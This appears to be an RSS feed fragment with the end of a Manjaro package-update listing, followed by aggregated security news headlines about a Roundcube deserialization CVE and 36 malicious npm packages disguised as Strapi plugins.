                             openrgb             1.0rc2-5             1.0rc2-6
                          pandoc-cli               3.5-18                3.6-2
                     pandoc-crossref           0.3.19-182           0.3.19-188
                         pandoc-plot            1.9.1-256            1.9.1-263
                         pandora_box             0.20.0-1             0.20.1-1
                            paraview             6.0.1-10             6.0.1-11
                            pd-sfizz             1.2.3-12             1.2.3-13
                      percona-server            8.4.8_8-1            8.4.8_8-2
              percona-server-clients            8.4.8_8-1            8.4.8_8-2
             perl-business-isbn-data       20260325.001-1       20260328.001-1
                         perl-libwww               6.81-2               6.82-1
                     perl-xml-parser               2.48-1               2.49-1
                            php-grpc             1.78.1-2             1.80.0-1
                     php-legacy-grpc             1.78.1-2             1.80.0-1
                     platformio-core             6.1.19-1             6.1.19-3
                platformio-core-udev             6.1.19-1             6.1.19-3
                      podman-desktop             1.25.1-1             1.26.2-1
                           postgrest           10.0.0-532             10.1.0-2
                            protobuf               33.1-4               34.1-1
                          protobuf-c              1.5.2-8              1.5.2-9
                      proton-vpn-cli              0.1.7-1              0.1.8-1
                  proton-vpn-gtk-app             4.15.0-1             4.15.1-1
                   protonmail-bridge             3.23.1-1             3.23.1-2
              protonmail-bridge-core             3.23.1-1             3.23.1-2
                        prusa-slicer              2.9.4-7              2.9.4-8
                           pt2-clone               1.85-1               1.87-1
                     python-cairosvg              2.8.2-1              2.9.0-1
                 python-cinderclient              9.7.0-1              9.8.0-1
                   python-cloudflare             2.15.1-1             2.16.0-1
               python-configargparse              1.7.3-1              1.7.4-1
                    python-curl_cffi             0.14.0-6             0.14.0-7
                     python-deepdiff              8.1.1-1              8.2.0-1
                     python-eth-hash              0.7.1-1              0.8.0-1
                        python-faker             40.9.0-1            40.10.0-1
                  python-fastnumbers              5.1.1-2              5.1.1-3
                     python-flasgger            0.9.7.1-7                    -
                python-flask-restful             0.3.10-6                    -
                        python-gdstk             0.9.46-1             0.9.47-1
     python-googleapis-common-protos             1.73.0-1             1.73.1-1
                       python-grpcio             1.78.1-2             1.80.0-1
                 python-grpcio-tools             1.78.1-2             1.80.0-1
                     python-identify             2.6.17-1             2.6.18-2
           python-importlib-metadata              8.7.1-3              9.0.0-1
                  python-json-logger              4.0.0-1              4.1.0-1
                         python-lmdb              2.1.1-1              2.2.0-1
                      python-mockito              2.0.0-1              2.0.1-1
                     python-narwhals             2.18.0-1             2.18.1-1
                        python-numpy              2.4.3-1              2.4.4-1
                         python-onnx           1:1.20.1-1           1:1.20.1-2
              python-onnxruntime-cpu             1.24.4-3             1.24.4-4
             python-onnxruntime-cuda             1.24.4-3             1.24.4-4
         python-onnxruntime-opt-cuda             1.24.4-3             1.24.4-4
         python-onnxruntime-opt-rocm             1.24.4-3             1.24.4-4
             python-onnxruntime-rocm             1.24.4-3             1.24.4-4
                       python-opencv             4.13.0-3             4.13.0-4
                  python-opencv-cuda             4.13.0-3             4.13.0-4
              python-openstackclient              8.0.0-1              8.1.0-1
                 python-openstacksdk              4.4.0-2              4.5.0-1
                       python-orjson             3.11.7-1             3.11.7-2
                    python-oslo-i18n              6.7.1-1              6.7.2-1
                      python-plexapi             4.18.0-1             4.18.1-1
                      python-protego              0.4.0-1              0.5.0-1
                     python-protobuf               33.1-4               34.1-1
          python-proton-vpn-api-core             4.16.0-1             4.17.2-1
                 python-pychromecast             14.0.9-4            14.0.10-1
                python-pydantic-core           3:2.41.5-3           3:2.41.5-4
                       python-pygit2             1.19.1-2             1.19.2-1
                     python-pypandoc             1.16.2-1               1.17-1
                     python-pypubsub             4.0.3-11              4.0.4-1
                       python-pysdl3           0.9.10b0-1           0.9.11b0-1
                      python-pytorch             2.10.0-3             2.10.0-4
                 python-pytorch-cuda             2.10.0-3             2.10.0-4
                  python-pytorch-opt             2.10.0-3             2.10.0-4
             python-pytorch-opt-cuda             2.10.0-3             2.10.0-4
             python-pytorch-opt-rocm             2.10.0-3             2.10.0-4
                 python-pytorch-rocm             2.10.0-3             2.10.0-4
                        python-regex          2026.2.28-1          2026.3.32-1
                     python-requests             2.32.5-4             2.33.1-1
              python-setuptools-rust             1.12.0-3             1.12.1-1
                        python-sybil              6.1.1-2              7.0.0-1
                    python-testtools              2.8.3-2              2.8.4-1
                      python-textual              8.1.1-1              8.2.1-1
                        python-tomli              2.4.0-1              2.4.1-1
                          python-tox             4.32.0-1             4.33.0-1
                       python-triton              3.5.1-3              3.5.1-4
                        python-urwid              3.0.5-1              4.0.0-1
                   python-validators             0.30.0-1             0.31.0-1
                        python-w3lib              2.3.0-2              2.3.1-1
                     python-werkzeug              3.1.5-1              3.1.6-1
                    python-z3-solver             4.15.4-2             4.16.0-1
                                qgis              4.0.0-1              4.0.0-2
                            qt6-grpc             6.11.0-1             6.11.0-2
                          quickshell              0.2.1-5              0.2.1-6
                           qwen-code             0.13.1-1             0.13.2-1
                            r2ghidra              5.9.8-1              6.1.2-1
                             radare2              5.9.8-1              6.1.2-1
                               razor               2.86-3               2.87-2
                                 re2       2:2025.11.05-1       2:2025.11.05-3
                              reaper               7.66-1               7.67-1
                               rizin              0.8.1-2              0.8.2-1
                               rocal              7.2.0-1              7.2.0-2
                          rofi-emoji              4.1.0-2              4.1.0-3
                          rpi-imager              2.0.6-2              2.0.6-3
                          rubberband              4.0.0-1              4.0.0-2
                   rubberband-ladspa              4.0.0-1              4.0.0-2
                      rubberband-lv2              4.0.0-1              4.0.0-2
                     rubberband-vamp              4.0.0-1              4.0.0-2
                    ruby-addressable              2.8.8-1              2.8.9-1
                          ruby-async             2.34.0-1             2.38.1-1
                ruby-async-container             0.31.0-1             0.34.4-1
                     ruby-async-pool             0.11.1-1             0.11.2-1
                  ruby-async-service             0.19.1-1             0.21.0-1
                     ruby-chef-utils            19.2.27-1            19.2.32-1
                ruby-google-protobuf               33.1-4               34.1-1
                           ruby-grpc             1.78.1-1             1.80.0-1
                       ruby-io-event             1.14.2-1             1.14.5-1
                         ruby-loofah             2.25.0-1             2.25.1-1
                            ruby-lsp             0.26.6-1             0.26.9-1
                       ruby-maxitest              6.1.0-1              6.2.0-1
            ruby-net-http-persistent              4.0.7-1              4.0.8-1
                  ruby-protocol-http             0.59.0-1             0.60.0-1
                  ruby-protocol-rack             0.21.1-1             0.22.0-1
                  ruby-public_suffix              7.0.2-1              7.0.5-1
           ruby-rails-html-sanitizer              1.6.2-3              1.7.0-1
            ruby-repl_type_completor             0.1.13-1             0.1.15-1
                         ruby-sequel             5.99.0-1            5.101.0-1
                 ruby-sorbet-runtime          0.6.12942-1          0.6.13068-1
                        ruby-sqlite3              2.9.1-1              2.9.2-1
        ruby-sus-fixtures-async-http             0.12.0-1             0.12.1-1
                       ruby-zeitwerk              2.7.3-1              2.7.5-1
                      rustypaste-cli              0.9.4-1              0.9.5-1
                           rz-cutter              2.4.1-5              2.4.1-6
                                sbcl              2.6.2-1              2.6.3-1
                           scap-dkms             0.20.0-9             0.23.1-1
                             scummvm           2026.1.0-1           2026.2.0-1
                          sentry-cli              3.3.4-1              3.3.5-1
                       sentry-native             0.13.3-1             0.13.4-1
                               sfizz              1.2.3-8             1.2.3-10
                           sfizz-lib              1.2.3-8             1.2.3-10
                           sfizz-lv2             1.2.3-12             1.2.3-13
                    sfizz-standalone              1.2.3-8             1.2.3-10
                            sfizz-ui             1.2.3-12             1.2.3-13
                          sfizz-vst3             1.2.3-12             1.2.3-13
                         shadowsocks    3.0.0a.20180219-9                    -
                          shellcheck            0.11.0-79            0.11.0-81
                            skaffold             2.18.0-1             2.18.2-1
                                skim              4.0.1-1              4.2.0-1
                         slicer-udev              2.9.4-7              2.9.4-8
                            smplayer             25.6.0-1             25.6.0-2
                            soapyuhd             0.4.1-14             0.4.1-15
                      spotify-player             0.22.1-1             0.23.0-1
                           sqlcipher             4.13.0-1             4.14.0-1
                            sqlfluff              4.0.4-2              4.1.0-1
                             sslscan              2.2.1-1              2.2.2-1
                               stack          2.9.3.1-118          2.9.3.1-123
                             step-ca             0.29.0-1             0.30.2-1
                          strongswan              6.0.4-2              6.0.5-1
                             stumpwm              24.11-9             24.11-10
                     stylish-haskell          0.14.5.0-11          0.14.5.0-13
                               swtpm             0.10.1-1             0.10.1-2
                                 syd             3.51.0-1             3.51.2-1
                           syslog-ng             4.11.0-1             4.11.0-2
                      syslog-ng-amqp             4.11.0-1             4.11.0-2
                    syslog-ng-geoip2             4.11.0-1             4.11.0-2
                     syslog-ng-kafka             4.11.0-1             4.11.0-2
                   syslog-ng-mongodb             4.11.0-1             4.11.0-2
                    syslog-ng-python             4.11.0-1             4.11.0-2
                     syslog-ng-redis             4.11.0-1             4.11.0-2
                      syslog-ng-smtp             4.11.0-1             4.11.0-2
                      syslog-ng-snmp             4.11.0-1             4.11.0-2
                       syslog-ng-sql             4.11.0-1             4.11.0-2
                             systing              1.0.0-1              1.0.0-2
                            taffybar             4.1.0-13             4.1.0-18
                      tamarin-prover            1.12.0-10            1.12.0-14
                     taskwarrior-tui             0.26.7-1             0.26.8-1
                     tauon-music-box              9.1.1-1              9.1.2-1
                    telegram-desktop              6.6.4-6              6.6.4-7
                          terragrunt             0.99.4-2             0.99.5-1
                              thunar             4.20.7-1             4.20.8-1
                         thunderbird              149.0-1            149.0.1-1
                 thunderbird-i18n-af              149.0-1            149.0.1-1
                 thunderbird-i18n-ar              149.0-1            149.0.1-1
                thunderbird-i18n-ast              149.0-1            149.0.1-1
                 thunderbird-i18n-be              149.0-1            149.0.1-1
                 thunderbird-i18n-bg              149.0-1            149.0.1-1
                 thunderbird-i18n-br              149.0-1            149.0.1-1
                 thunderbird-i18n-ca              149.0-1            149.0.1-1
                thunderbird-i18n-cak              149.0-1            149.0.1-1
                 thunderbird-i18n-cs              149.0-1            149.0.1-1
                 thunderbird-i18n-cy              149.0-1            149.0.1-1
                 thunderbird-i18n-da              149.0-1            149.0.1-1
                 thunderbird-i18n-de              149.0-1            149.0.1-1
                thunderbird-i18n-dsb              149.0-1            149.0.1-1
                 thunderbird-i18n-el              149.0-1            149.0.1-1
              thunderbird-i18n-en-gb              149.0-1            149.0.1-1
              thunderbird-i18n-en-us              149.0-1            149.0.1-1
              thunderbird-i18n-es-ar              149.0-1            149.0.1-1
              thunderbird-i18n-es-es              149.0-1            149.0.1-1
                 thunderbird-i18n-et              149.0-1            149.0.1-1
                 thunderbird-i18n-eu              149.0-1            149.0.1-1
                 thunderbird-i18n-fi              149.0-1            149.0.1-1
                 thunderbird-i18n-fr              149.0-1            149.0.1-1
              thunderbird-i18n-fy-nl              149.0-1            149.0.1-1
              thunderbird-i18n-ga-ie              149.0-1            149.0.1-1
                 thunderbird-i18n-gd              149.0-1            149.0.1-1
                 thunderbird-i18n-gl              149.0-1            149.0.1-1
                 thunderbird-i18n-he              149.0-1            149.0.1-1
                 thunderbird-i18n-hr              149.0-1            149.0.1-1
                thunderbird-i18n-hsb              149.0-1            149.0.1-1
                 thunderbird-i18n-hu              149.0-1            149.0.1-1
              thunderbird-i18n-hy-am              149.0-1            149.0.1-1
                 thunderbird-i18n-id              149.0-1            149.0.1-1
                 thunderbird-i18n-is              149.0-1            149.0.1-1
                 thunderbird-i18n-it              149.0-1            149.0.1-1
                 thunderbird-i18n-ja              149.0-1            149.0.1-1
                 thunderbird-i18n-ka              149.0-1            149.0.1-1
                thunderbird-i18n-kab              149.0-1            149.0.1-1
                 thunderbird-i18n-kk              149.0-1            149.0.1-1
                 thunderbird-i18n-ko              149.0-1            149.0.1-1
                 thunderbird-i18n-lt              149.0-1            149.0.1-1
                 thunderbird-i18n-ms              149.0-1            149.0.1-1
              thunderbird-i18n-nb-no              149.0-1            149.0.1-1
                 thunderbird-i18n-nl              149.0-1            149.0.1-1
              thunderbird-i18n-nn-no              149.0-1            149.0.1-1
              thunderbird-i18n-pa-in              149.0-1            149.0.1-1
                 thunderbird-i18n-pl              149.0-1            149.0.1-1
              thunderbird-i18n-pt-br              149.0-1            149.0.1-1
              thunderbird-i18n-pt-pt              149.0-1            149.0.1-1
                 thunderbird-i18n-rm              149.0-1            149.0.1-1
                 thunderbird-i18n-ro              149.0-1            149.0.1-1
                 thunderbird-i18n-ru              149.0-1            149.0.1-1
                 thunderbird-i18n-sk              149.0-1            149.0.1-1
                 thunderbird-i18n-sl              149.0-1            149.0.1-1
                 thunderbird-i18n-sq              149.0-1            149.0.1-1
                 thunderbird-i18n-sr              149.0-1            149.0.1-1
              thunderbird-i18n-sv-se              149.0-1            149.0.1-1
                 thunderbird-i18n-th              149.0-1            149.0.1-1
                 thunderbird-i18n-tr              149.0-1            149.0.1-1
                 thunderbird-i18n-uk              149.0-1            149.0.1-1
                 thunderbird-i18n-uz              149.0-1            149.0.1-1
                 thunderbird-i18n-vi              149.0-1            149.0.1-1
              thunderbird-i18n-zh-cn              149.0-1            149.0.1-1
              thunderbird-i18n-zh-tw              149.0-1            149.0.1-1
                         timescaledb             2.26.0-1             2.26.1-1
             timescaledb-old-upgrade             2.26.0-1             2.26.1-1
                       tokio-console             0.1.14-1             0.1.14-2
                             traefik             3.6.11-1             3.6.12-1
                                tree              2.3.1-1              2.3.2-1
                             udiskie              2.6.1-1              2.6.2-1
                         udisks2-qt5              5.0.6-2                    -
              ultramaster-kr106-clap              2.4.4-1            2.4.6.1-1
               ultramaster-kr106-lv2              2.4.4-1            2.4.6.1-1
              ultramaster-kr106-vst3              2.4.4-1            2.4.6.1-1
                               usage             2.18.2-1              3.2.0-1
                            usbguard              1.1.4-4              1.1.4-5
                                vala            0.56.18-5            0.56.19-1
                             vcspull             1.58.0-1             1.58.1-1
                    vhba-module-dkms          20250329-70          20250329-71
                                 vim           9.2.0204-2           9.2.0272-1
                         vim-runtime           9.2.0204-2           9.2.0272-1
                                 vis 0.9.r397.gda84fe70-1 0.9.r399.g1a4fb0fd-1
             vis-syntax-highlighting 0.9.r397.gda84fe70-1 0.9.r399.g1a4fb0fd-1
                                 vlc             3.0.22-1             3.0.22-2
                             vlc-cli             3.0.22-1             3.0.22-2
                     vlc-gui-ncurses             3.0.22-1             3.0.22-2
                          vlc-gui-qt             3.0.22-1             3.0.22-2
                      vlc-gui-skins2             3.0.22-1             3.0.22-2
                   vlc-plugin-a52dec             3.0.22-1             3.0.22-2
                    vlc-plugin-aalib             3.0.22-1             3.0.22-2
                     vlc-plugin-alsa             3.0.22-1             3.0.22-2
                      vlc-plugin-aom             3.0.22-1             3.0.22-2
                  vlc-plugin-archive             3.0.22-1             3.0.22-2
                  vlc-plugin-aribb24             3.0.22-1             3.0.22-2
                  vlc-plugin-aribb25             3.0.22-1             3.0.22-2
                      vlc-plugin-ass             3.0.22-1             3.0.22-2
                    vlc-plugin-avahi             3.0.22-1             3.0.22-2
                   vlc-plugin-bluray             3.0.22-1             3.0.22-2
                     vlc-plugin-caca             3.0.22-1             3.0.22-2
                     vlc-plugin-cddb             3.0.22-1             3.0.22-2
               vlc-plugin-chromecast             3.0.22-1             3.0.22-2
                    vlc-plugin-dav1d             3.0.22-1             3.0.22-2
                     vlc-plugin-dbus             3.0.22-1             3.0.22-2
         vlc-plugin-dbus-screensaver             3.0.22-1             3.0.22-2
                      vlc-plugin-dca             3.0.22-1             3.0.22-2
                      vlc-plugin-dvb             3.0.22-1             3.0.22-2
                      vlc-plugin-dvd             3.0.22-1             3.0.22-2
                    vlc-plugin-faad2             3.0.22-1             3.0.22-2
                   vlc-plugin-ffmpeg             3.0.22-1             3.0.22-2
                 vlc-plugin-firewire             3.0.22-1             3.0.22-2
                     vlc-plugin-flac             3.0.22-1             3.0.22-2
               vlc-plugin-fluidsynth             3.0.22-1             3.0.22-2
                 vlc-plugin-freetype             3.0.22-1             3.0.22-2
                      vlc-plugin-gme             3.0.22-1             3.0.22-2
                   vlc-plugin-gnutls             3.0.22-1             3.0.22-2
                vlc-plugin-gstreamer             3.0.22-1             3.0.22-2
                  vlc-plugin-inflate             3.0.22-1             3.0.22-2
                     vlc-plugin-jack             3.0.22-1             3.0.22-2
                  vlc-plugin-journal             3.0.22-1             3.0.22-2
                     vlc-plugin-jpeg             3.0.22-1             3.0.22-2
                     vlc-plugin-kate             3.0.22-1             3.0.22-2
                  vlc-plugin-kwallet             3.0.22-1             3.0.22-2
                vlc-plugin-libsecret             3.0.22-1             3.0.22-2
                     vlc-plugin-lirc             3.0.22-1             3.0.22-2
                  vlc-plugin-live555             3.0.22-1             3.0.22-2
                      vlc-plugin-lua             3.0.22-1             3.0.22-2
                      vlc-plugin-mad             3.0.22-1             3.0.22-2
                 vlc-plugin-matroska             3.0.22-1             3.0.22-2
                     vlc-plugin-mdns             3.0.22-1             3.0.22-2
                  vlc-plugin-modplug             3.0.22-1             3.0.22-2
                    vlc-plugin-mpeg2             3.0.22-1             3.0.22-2
                   vlc-plugin-mpg123             3.0.22-1             3.0.22-2
                      vlc-plugin-mtp             3.0.22-1             3.0.22-2
                 vlc-plugin-musepack             3.0.22-1             3.0.22-2
                      vlc-plugin-nfs             3.0.22-1             3.0.22-2
                   vlc-plugin-notify             3.0.22-1             3.0.22-2
                      vlc-plugin-ogg             3.0.22-1             3.0.22-2
                     vlc-plugin-opus             3.0.22-1             3.0.22-2
                      vlc-plugin-png             3.0.22-1             3.0.22-2
                    vlc-plugin-pulse             3.0.22-1             3.0.22-2
                vlc-plugin-quicksync             3.0.22-1             3.0.22-2
               vlc-plugin-samplerate             3.0.22-1             3.0.22-2
                      vlc-plugin-sdl             3.0.22-1             3.0.22-2
                     vlc-plugin-sftp             3.0.22-1             3.0.22-2
                    vlc-plugin-shout             3.0.22-1             3.0.22-2
                      vlc-plugin-smb             3.0.22-1             3.0.22-2
                     vlc-plugin-soxr             3.0.22-1             3.0.22-2
                    vlc-plugin-speex             3.0.22-1             3.0.22-2
                      vlc-plugin-srt             3.0.22-1             3.0.22-2
                      vlc-plugin-svg             3.0.22-1             3.0.22-2
                      vlc-plugin-tag             3.0.22-1             3.0.22-2
                   vlc-plugin-theora             3.0.22-1             3.0.22-2
                  vlc-plugin-twolame             3.0.22-1             3.0.22-2
                     vlc-plugin-udev             3.0.22-1             3.0.22-2
                     vlc-plugin-upnp             3.0.22-1             3.0.22-2
                   vlc-plugin-vorbis             3.0.22-1             3.0.22-2
                      vlc-plugin-vpx             3.0.22-1             3.0.22-2
                     vlc-plugin-x264             3.0.22-1             3.0.22-2
                     vlc-plugin-x265             3.0.22-1             3.0.22-2
                      vlc-plugin-xml             3.0.22-1             3.0.22-2
                     vlc-plugin-zvbi             3.0.22-1             3.0.22-2
                     vlc-plugins-all             3.0.22-1             3.0.22-2
                    vlc-plugins-base             3.0.22-1             3.0.22-2
                   vlc-plugins-extra             3.0.22-1             3.0.22-2
            vlc-plugins-video-output             3.0.22-1             3.0.22-2
           vlc-plugins-visualization             3.0.22-1             3.0.22-2
                              vmexec              0.4.0-1              0.5.2-1
                                vpnc  1:0.5.3.r539.r239-1  1:0.5.3.r557.r241-1
                         warzone2100              4.6.3-2              4.6.3-3
                           watchexec              2.5.0-1              2.5.1-1
             webrtc-audio-processing                2.1-5                2.1-6
                         wireplumber             0.5.13-2             0.5.14-1
                    wireplumber-docs             0.5.13-2             0.5.14-1
                       wireshark-cli              4.6.4-1              4.6.4-2
                        wireshark-qt              4.6.4-1              4.6.4-2
              xdg-desktop-portal-dde             1.0.13-7             1.0.14-1
                           xdp-tools              1.6.2-1              1.6.3-1
                           xfdesktop             4.20.1-3             4.20.2-1
                              xmobar             0.50-137             0.50-141
                              xmonad           0.18.0-154           0.18.0-156
                      xmonad-contrib           0.18.1-138           0.18.1-140
                         xmonad-dbus          0.1.0.2-240          0.1.0.2-243
                       xmonad-extras             0.17.3-6             0.17.3-9
                      xorg-setxkbmap              1.3.4-2              1.3.5-1
                                 xrt          1:2.21.75-5          1:2.21.75-6
                          xtrabackup            8.4.0_5-1            8.4.0_5-2
                                  z3             4.15.4-2             4.16.0-1
                             z3-java             4.15.4-2             4.16.0-1
                             zathura         2026.02.22-1         2026.03.27-1
                          zathura-cb         2026.02.03-3         2026.02.03-4
                        zathura-djvu         2026.02.03-3         2026.02.03-4
                   zathura-pdf-mupdf         2026.02.03-5         2026.02.03-6
                 zathura-pdf-poppler         2026.02.03-3         2026.02.03-4
                          zathura-ps         2026.02.03-3         2026.02.03-4
                              zettlr              4.3.0-1              4.3.1-1
                              zypper            1.14.95-1            1.14.95-2
                            ares-emu                    -                147-2
                             diffoci                    -              0.1.8-1
                         govulncheck                    -              1.1.4-1
                       libkysdk-base                    -            3.0.1.0-1
                         librashader                    -             0.10.1-2
                       python-podman                    -              5.8.0-2
                        python-pylxd                    -              2.4.0-2
                        python-ws4py                    -              0.6.0-4
                         udisks2-qt6                    -              6.0.1-1


:: Different sync package(s) in repository multilib x86_64

-------------------------------------------------------------------------------
                             PACKAGE           2026-03-28           2026-03-31
-------------------------------------------------------------------------------
                         lib32-clang             22.1.1-1             22.1.2-1
              lib32-gst-plugins-base             1.28.1-2             1.28.1-3
         lib32-gst-plugins-base-libs             1.28.1-2             1.28.1-3
              lib32-gst-plugins-good             1.28.1-2             1.28.1-3
                     lib32-gstreamer             1.28.1-2             1.28.1-3
                        lib32-libvpx             1.15.2-2             1.16.0-2
                          lib32-llvm           1:22.1.1-1           1:22.1.2-1
                     lib32-llvm-libs           1:22.1.1-1           1:22.1.2-1
</code></pre>
<p><a href="https://forum.manjaro.org/t/testing-update-2026-03-31-linux-7-0-rc6-gnome-thunderbird-deepin-freecad-wireplumber/186720/1">Click to view the poll.</a></p>
<p>Check if your mirror has already synced:</p>
<ul>
<li><a href="https://repo.manjaro.org/">Mirror-Check Service</a></li>
</ul>
<hr>
            <p><small>5 posts - 5 participants</small></p>
            <p><a href="https://forum.manjaro.org/t/testing-update-2026-03-31-linux-7-0-rc6-gnome-thunderbird-deepin-freecad-wireplumber/186720">Read full topic</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-35537 | Roundcube Webmail up to 1.5.13/1.6.13 redis/memcache deserialization (618c5428edc69fb088e7ac6c89e506dd39df3 / Nessus ID 304896)]]></title>
<description><![CDATA[A vulnerability classified as problematic has been found in Roundcube Webmail up to 1.5.13/1.6.13. The affected element is an unknown function of the component redis/memcache. Performing a manipulation results in deserialization.

This vulnerability was named CVE-2026-35537. The attack may be ini...]]></description>
<link>https://tsecurity.de/de/3408885/sicherheitsluecken/cve-2026-35537-roundcube-webmail-up-to-15131613-redismemcache-deserialization-618c5428edc69fb088e7ac6c89e506dd39df3-nessus-id-304896/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3408885/sicherheitsluecken/cve-2026-35537-roundcube-webmail-up-to-15131613-redismemcache-deserialization-618c5428edc69fb088e7ac6c89e506dd39df3-nessus-id-304896/</guid>
<pubDate>Sun, 05 Apr 2026 10:37:05 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability classified as <a href="https://vuldb.com/kb/risk">problematic</a> has been found in <a href="https://vuldb.com/product/roundcube:webmail">Roundcube Webmail up to 1.5.13/1.6.13</a>. The affected element is an unknown function of the component <em>redis/memcache</em>. Performing a manipulation results in deserialization.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2026-35537">CVE-2026-35537</a>. The attack may be initiated remotely. There is no available exploit.

It is recommended to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[IT Security News Hourly Summary 2026-04-05 09h : 2 posts]]></title>
<description><![CDATA[2 posts were published in the last hour 6:7 : Fortinet Patches Actively Exploited CVE-2026-35616 in FortiClient EMS 6:7 : 36 Malicious npm Packages Exploited Redis, PostgreSQL to Deploy Persistent Implants
Read more →
The post IT Security News Hourly Summary 2026-04-05 09h : 2 posts appeared firs...]]></description>
<link>https://tsecurity.de/de/3408773/it-security-nachrichten/it-security-news-hourly-summary-2026-04-05-09h-2-posts/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3408773/it-security-nachrichten/it-security-news-hourly-summary-2026-04-05-09h-2-posts/</guid>
<pubDate>Sun, 05 Apr 2026 09:06:50 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>2 posts were published in the last hour 6:7 : Fortinet Patches Actively Exploited CVE-2026-35616 in FortiClient EMS 6:7 : 36 Malicious npm Packages Exploited Redis, PostgreSQL to Deploy Persistent Implants</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/it-security-news-hourly-summary-2026-04-05-09h-2-posts/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/it-security-news-hourly-summary-2026-04-05-09h-2-posts/">IT Security News Hourly Summary 2026-04-05 09h : 2 posts</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[36 Malicious npm Packages Exploited Redis, PostgreSQL to Deploy Persistent Implants]]></title>
<description><![CDATA[Cybersecurity researchers have discovered 36 malicious packages in the npm registry that are disguised as Strapi CMS plugins but come with different payloads to facilitate Redis and PostgreSQL exploitation, deploy reverse shells, harvest credentials, and drop a persistent implant. “Every package…...]]></description>
<link>https://tsecurity.de/de/3408702/it-security-nachrichten/36-malicious-npm-packages-exploited-redis-postgresql-to-deploy-persistent-implants/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3408702/it-security-nachrichten/36-malicious-npm-packages-exploited-redis-postgresql-to-deploy-persistent-implants/</guid>
<pubDate>Sun, 05 Apr 2026 08:21:20 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Cybersecurity researchers have discovered 36 malicious packages in the npm registry that are disguised as Strapi CMS plugins but come with different payloads to facilitate Redis and PostgreSQL exploitation, deploy reverse shells, harvest credentials, and drop a persistent implant. “Every package…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/36-malicious-npm-packages-exploited-redis-postgresql-to-deploy-persistent-implants/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/36-malicious-npm-packages-exploited-redis-postgresql-to-deploy-persistent-implants/">36 Malicious npm Packages Exploited Redis, PostgreSQL to Deploy Persistent Implants</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[36 Malicious npm Packages Exploited Redis, PostgreSQL to Deploy Persistent Implants]]></title>
<description><![CDATA[Cybersecurity researchers have discovered 36 malicious packages in the npm registry that are disguised as Strapi CMS plugins but come with different payloads to facilitate Redis and PostgreSQL exploitation, deploy reverse shells, harvest credentials, and drop a persistent implant.
"Every package ...]]></description>
<link>https://tsecurity.de/de/3408640/it-security-nachrichten/36-malicious-npm-packages-exploited-redis-postgresql-to-deploy-persistent-implants/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3408640/it-security-nachrichten/36-malicious-npm-packages-exploited-redis-postgresql-to-deploy-persistent-implants/</guid>
<pubDate>Sun, 05 Apr 2026 07:36:11 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Cybersecurity researchers have discovered 36 malicious packages in the npm registry that are disguised as Strapi CMS plugins but come with different payloads to facilitate Redis and PostgreSQL exploitation, deploy reverse shells, harvest credentials, and drop a persistent implant.
"Every package contains three files (package.json, index.js, postinstall.js), has no description, repository,]]></content:encoded>
</item>
<item>
<title><![CDATA[Gefährliche npm-Pakete zielen auf Redis und PostgreSQL]]></title>
<description><![CDATA[LONDON (IT BOLTWISE) – Eine neue Bedrohung in der Open-Source-Community wurde entdeckt: 36 bösartige npm-Pakete, die als Strapi CMS-Plugins getarnt sind, nutzen Sicherheitslücken in Redis und PostgreSQL aus. Diese Pakete zielen darauf ab, Entwickler zu täuschen und schädliche Software zu installi...]]></description>
<link>https://tsecurity.de/de/3408639/it-security-nachrichten/gefaehrliche-npm-pakete-zielen-auf-redis-und-postgresql/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3408639/it-security-nachrichten/gefaehrliche-npm-pakete-zielen-auf-redis-und-postgresql/</guid>
<pubDate>Sun, 05 Apr 2026 07:36:09 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1024" height="1024" src="https://www.it-boltwise.de/wp-content/uploads/2026/04/ai-malicious-npm-packages.jpg" class="attachment- size- wp-post-image" alt="" decoding="async" fetchpriority="high" srcset="https://www.it-boltwise.de/wp-content/uploads/2026/04/ai-malicious-npm-packages.jpg 1024w, https://www.it-boltwise.de/wp-content/uploads/2026/04/ai-malicious-npm-packages-300x300.jpg 300w, https://www.it-boltwise.de/wp-content/uploads/2026/04/ai-malicious-npm-packages-150x150.jpg 150w, https://www.it-boltwise.de/wp-content/uploads/2026/04/ai-malicious-npm-packages-768x768.jpg 768w, https://www.it-boltwise.de/wp-content/uploads/2026/04/ai-malicious-npm-packages-840x840.jpg 840w, https://www.it-boltwise.de/wp-content/uploads/2026/04/ai-malicious-npm-packages-120x120.jpg 120w" sizes="(max-width: 1024px) 100vw, 1024px">LONDON (IT BOLTWISE) – Eine neue Bedrohung in der Open-Source-Community wurde entdeckt: 36 bösartige npm-Pakete, die als Strapi CMS-Plugins getarnt sind, nutzen Sicherheitslücken in Redis und PostgreSQL aus. Diese Pakete zielen darauf ab, Entwickler zu täuschen und schädliche Software zu installieren, die auf sensible Daten zugreifen kann. In der Welt der Open-Source-Software hat sich eine […]</p>
<div><a href="https://www.it-boltwise.de/gefaehrliche-npm-pakete-zielen-auf-redis-und-postgresql.html">... den vollständigen Artikel <strong>»Gefährliche npm-Pakete zielen auf Redis und PostgreSQL«</strong> lesen</a></div>
